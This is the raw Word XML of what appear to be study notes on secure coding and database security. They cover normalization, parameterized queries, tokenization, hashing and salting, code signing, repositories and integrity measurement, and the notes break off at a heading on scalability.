    <w:p w14:paraId="567AAAFB" w14:textId="737B53EC" w:rsidR="00976C45" w:rsidRDefault="00976C45" w:rsidP="00976C4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 set of design principles that database designers should follow when building and modifying databases. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E26AFC" w14:textId="480B7459" w:rsidR="006A55ED" w:rsidRDefault="006A55ED" w:rsidP="00976C4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Databases that follow these principles are said to be in normal forms, which are numbered in increasing order of the level of principle followed</w:t>
      </w:r>
      <w:r w:rsidR="004A13A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67255B7E" w14:textId="3C56DAE0" w:rsidR="004A13A1" w:rsidRDefault="004A13A1" w:rsidP="004A13A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First normal form or 1NF, to 2NF, 3NF, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5D96F" w14:textId="693241B9" w:rsidR="004A13A1" w:rsidRDefault="004A13A1" w:rsidP="004A13A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These forms provide benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3517D418" w14:textId="77BC55D2" w:rsidR="004A13A1" w:rsidRDefault="004A13A1" w:rsidP="004A13A1">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Prevent data inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C04D08B" w14:textId="16021318" w:rsidR="004A13A1" w:rsidRDefault="004A13A1" w:rsidP="004A13A1">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Prevent update anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A70D9FF" w14:textId="66ECBE06" w:rsidR="004A13A1" w:rsidRDefault="004A13A1" w:rsidP="004A13A1">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Reduce the need for reconstructing existing databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F2659F" w14:textId="19B15899" w:rsidR="004A13A1" w:rsidRDefault="004A13A1" w:rsidP="004A13A1">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Make the database schema more informative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B23B5" w14:textId="46CFF80A" w:rsidR="000E5193" w:rsidRPr="001A77C8" w:rsidRDefault="000E5193" w:rsidP="000E5193">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Parametrized Queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD8B606" w14:textId="60BFE131" w:rsidR="000E5193" w:rsidRDefault="009B3058" w:rsidP="000E519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These offer another technique to protect against injection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B8449" w14:textId="2EBA1FED" w:rsidR="009B3058" w:rsidRDefault="009B3058" w:rsidP="009B305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In parameterized queries, the client does not directly send SQL code to the database server, instead, the client sends arguments to the server, which then inserts those arguments into a precompiled query template.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB940DB" w14:textId="37592AD1" w:rsidR="009B3058" w:rsidRDefault="009B3058" w:rsidP="009B3058">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This protects against injection attacks and improves database performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BBF8D3" w14:textId="51CC686B" w:rsidR="003149BF" w:rsidRDefault="003149BF" w:rsidP="003149BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Stored Procedures:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E26083" w14:textId="40771FFA" w:rsidR="003149BF" w:rsidRDefault="003149BF" w:rsidP="003149B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An example of an implementation of parametrized queries used by some database platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543893F6" w14:textId="01D182F8" w:rsidR="00785C65" w:rsidRPr="001A77C8" w:rsidRDefault="00AE5733" w:rsidP="00785C65">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Obfuscation and Camouflage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D335A71" w14:textId="563BAB0B" w:rsidR="00AE5733" w:rsidRDefault="00C771B3" w:rsidP="00AE573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Maintaining sensitive personal information in databases exposes an organization to risk in the event that information is stolen by an attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA56670" w14:textId="1657A45E" w:rsidR="00106CCE" w:rsidRDefault="00106CCE" w:rsidP="00AE573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Database administrators should take measures to protect against </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>data exposure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A62A03D" w14:textId="2C5ED388" w:rsidR="00106CCE" w:rsidRDefault="00967F18" w:rsidP="00967F18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Data Minimization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the best defense, where organizations collect only the data they need and dispose of any sensitive information as soon as it is not needed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982F82B" w14:textId="68670546" w:rsidR="00754EF6" w:rsidRDefault="00754EF6" w:rsidP="00967F18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tokenization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> replaces personal identifiers that might directly reveal an individual’s identity with a unique identifier using a lookup table. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E09FF79" w14:textId="15CE9C64" w:rsidR="005C2964" w:rsidRDefault="005C2964" w:rsidP="005C2964">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lastRenderedPageBreak/>
        <w:t>Lookup table must be extremely private, however.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5529E" w14:textId="315E3121" w:rsidR="005C2964" w:rsidRDefault="005C2964" w:rsidP="005C2964">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hashing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses a cryptographic ha</w:t>
      </w:r>
      <w:r w:rsidR="00253022">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> function to replace sensitive identifiers with an </w:t>
      </w:r>
      <w:r w:rsidR="00253022">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>irreversible alternative identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216880D4" w14:textId="0251B91E" w:rsidR="00253022" w:rsidRDefault="00253022" w:rsidP="00253022">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Salting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> these values with a random number prior to hashing them makes these hashed values resistant to a type of attack known as rainbow table </w:t>
      </w:r>
      <w:r w:rsidR="0048032F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77062EA2" w14:textId="4F7C435D" w:rsidR="00253022" w:rsidRPr="001A77C8" w:rsidRDefault="00253022" w:rsidP="00253022">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code Security</w:t>
      </w:r>
      <w:r w:rsidR="003F68E1" w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF434DA" w14:textId="290C9DF7" w:rsidR="003F68E1" w:rsidRDefault="0048032F" w:rsidP="003F68E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Software developers should safeguard the creation, storage, and delivery of their code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAD86B8" w14:textId="5DC06120" w:rsidR="0048032F" w:rsidRPr="0048032F" w:rsidRDefault="0048032F" w:rsidP="003F68E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code Signing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7A748" w14:textId="135F2485" w:rsidR="0048032F" w:rsidRDefault="0048032F" w:rsidP="0048032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Provides developers with a way to confirm the </w:t>
      </w:r>
      <w:r w:rsidR="00C55AAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>authenticity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of their code to end users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73126809" w14:textId="46572F30" w:rsidR="0048032F" w:rsidRDefault="0048032F" w:rsidP="0048032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They use cryptographic function to </w:t>
      </w:r>
      <w:r w:rsidR="00C55AAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>digitally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sign their code with their own private key, and then browsers can use the developer’s public key to verify </w:t>
      </w:r>
      <w:r w:rsidR="00C55AAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the signature and thus the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608E7011" w14:textId="7232DD2C" w:rsidR="00C55AAF" w:rsidRDefault="00C55AAF" w:rsidP="00C55AAF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code Reuse:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7AA53" w14:textId="08E35917" w:rsidR="00C55AAF" w:rsidRDefault="002B610F" w:rsidP="00C55AA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In general, organizations reuse their code a lot and even reuse the code made by third parties which are distributed through software development kits (SDKs) </w:t>
      </w:r>
      <w:r w:rsidR="002F76F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and libraries. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F45547C" w14:textId="0E3DBC6D" w:rsidR="002F76F4" w:rsidRDefault="002F76F4" w:rsidP="00C55AA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Though, this isn’t a big deal, it is important that security experts examine the code and make sure there is nothing malicious about it, or make sure the code doesn’t unintendedly cause a security risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA6E9B" w14:textId="710FE1B4" w:rsidR="002F76F4" w:rsidRDefault="002F76F4" w:rsidP="002F76F4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Software Diversity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A11D7C" w14:textId="6B9D53B0" w:rsidR="002F76F4" w:rsidRDefault="000B1AE7" w:rsidP="002F76F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Security professionals should watch for places in the organization that are dependent on a single piece of source code, binary executable file, or compilers</w:t>
      </w:r>
      <w:r w:rsidR="00DA3E5F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61594E3D" w14:textId="724A543B" w:rsidR="00DA3E5F" w:rsidRDefault="00DA3E5F" w:rsidP="00DA3E5F">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Though it may not be possible to eliminate the dependence, it is still important to track it as you don’t want a single point of failure to </w:t>
      </w:r>
      <w:r w:rsidR="00334993">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>destroy everything.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C67758" w14:textId="071EC16C" w:rsidR="00334993" w:rsidRDefault="00334993" w:rsidP="00334993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code Repositories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077EAA2F" w14:textId="15E06093" w:rsidR="00334993" w:rsidRDefault="00334993" w:rsidP="0033499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Centralized locations for the storage and management of application source code. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD6A7C8" w14:textId="3A7895C1" w:rsidR="00E2068F" w:rsidRDefault="00E2068F" w:rsidP="00E2068F">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Allows for secure storage an</w:t>
      </w:r>
      <w:r w:rsidR="00812AFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d the coordination of changed among multiple developers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CB35F" w14:textId="1692C94D" w:rsidR="0004412C" w:rsidRDefault="00F24A6A" w:rsidP="0004412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Version Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE4A2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is something also performed by repositories that allow the tracking of changes and the rollback of code to earlier versions when required</w:t>
      </w:r>
      <w:r w:rsidR="0004412C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C49148" w14:textId="5122B557" w:rsidR="0004412C" w:rsidRDefault="0004412C" w:rsidP="0004412C">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This makes auditing a lot easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03D976" w14:textId="267FEC6D" w:rsidR="0004412C" w:rsidRDefault="001D2F72" w:rsidP="0004412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dead Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is code in use but nobody in the organization is responsible for it and they may not even know where it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E61858" w14:textId="56B9A335" w:rsidR="001D2F72" w:rsidRDefault="001D2F72" w:rsidP="001D2F7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Repositories help fix this problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488AB364" w14:textId="24BD9B34" w:rsidR="001D2F72" w:rsidRDefault="001D2F72" w:rsidP="001D2F72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Integrity Measurement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7720CEB6" w14:textId="7B3D9C98" w:rsidR="001D2F72" w:rsidRDefault="006D16BC" w:rsidP="001D2F7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The use </w:t>
      </w:r>
      <w:r w:rsidR="00235BFE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of cryptographic hash functions to verify that the code being released into production matches the code that was previously approved</w:t>
      </w:r>
      <w:r w:rsidR="00FF6240">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F6AA3" w14:textId="1474D1AF" w:rsidR="00FF6240" w:rsidRDefault="00FF6240" w:rsidP="00FF6240">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Any changes in the hash values means the code was altered intentionally or unintentionally, which requires a fix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDEDC78" w14:textId="4D363760" w:rsidR="00FF6240" w:rsidRDefault="00FF6240" w:rsidP="00FF6240">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Application Resilience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7749C4" w14:textId="78522865" w:rsidR="00FF6240" w:rsidRDefault="008C3EB2" w:rsidP="00FF624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When we design applications, we should create them in a manner that makes them resilient in the face of changing demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15891277" w14:textId="47F6A377" w:rsidR="008C3EB2" w:rsidRDefault="008C3EB2" w:rsidP="008C3EB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This can be achieved with two principles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389641EB" w14:textId="07F71425" w:rsidR="008C3EB2" w:rsidRDefault="008C3EB2" w:rsidP="008C3EB2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scalability:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
